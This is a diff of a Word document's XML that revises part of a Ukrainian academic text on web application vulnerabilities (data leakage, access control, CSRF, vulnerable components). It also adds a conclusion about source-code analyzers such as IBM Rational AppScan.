           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>8. Підробка міжсайтових запитів (CSRF)</w:t>
+        <w:t>Виведені додатком повідомлення про помилки, дозволяють зловмисникам краще зрозуміти структуру бази даних і підказують, в якому напрямку краще діяти, які команди і сценарії краще намагатися впроваджувати.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28242,6 +28104,352 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>6. Витік вразливих даних</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Web-додаток повинен правильно працювати з уразливими даними і захищати їх. Для запобігання витоку даних в процесі їх обробки, передачі і зберігання необхідно забезпечувати захист на всіх рівнях за допомогою надійних процедур контролю доступу, загальновизнаних криптоалгоритмів і методів управління ключами шифрування.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">7. Відсутність контролю доступу до функціонального </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>івня</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Користувачі, що працюють з </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-додатком, можуть мати </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізні рівні повноважень. У </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>таких</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> випадках базова аутентифікація може не впоратися з тим, щоб не допустити використання користувачами повноважень, функцій і даних, доступ до яких їм заборонено.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Якщо захист привілейованих функцій полягає лише в тому, що вони просто заховані в коді програми, то зловмисник, скомпрометував</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ши</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>обл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>іковий запис з недостатніми привілеями, може спробувати отримати доступ до закритих функціями (і даними), підбираючи виклики до них.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>8. Підробка міжсайтових запитів (CSRF)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
         <w:t>Підробка міжсайтових запитів (cross-site request forgery, CSRF) заснована на тому, що аутентиф</w:t>
       </w:r>
       <w:r>
@@ -28363,28 +28571,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">9. Використання </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>компонентів з відомими уразливостями</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -28400,7 +28586,13 @@
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -28409,7 +28601,56 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">9. Використання </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>компонентів з відомими уразливостями</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
         <w:t>Будь-</w:t>
       </w:r>
       <w:r>
@@ -28585,14 +28826,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Висновки до розділу 2</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -28601,9 +28855,90 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">У даному розділі представлено класифікацію аналізаторів вихідного коду, принцип та алгоритми їх роботи. На прикладі </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>IBM</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Rational</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AppScan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> було описано основні можливості аналізаторів, а також типи вразливостей, що можуть бути відшукані завдяки цим програмам.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -28612,7 +28947,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -28623,7 +28958,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -28634,7 +28969,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -28645,7 +28980,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -28656,29 +28991,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -33758,7 +34071,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CD39B45B-05BA-4FE1-8B02-5BC7CB4C6C5C}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{534944D9-F9D2-43AE-A7DE-46867C53C5D0}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

</xml_diff>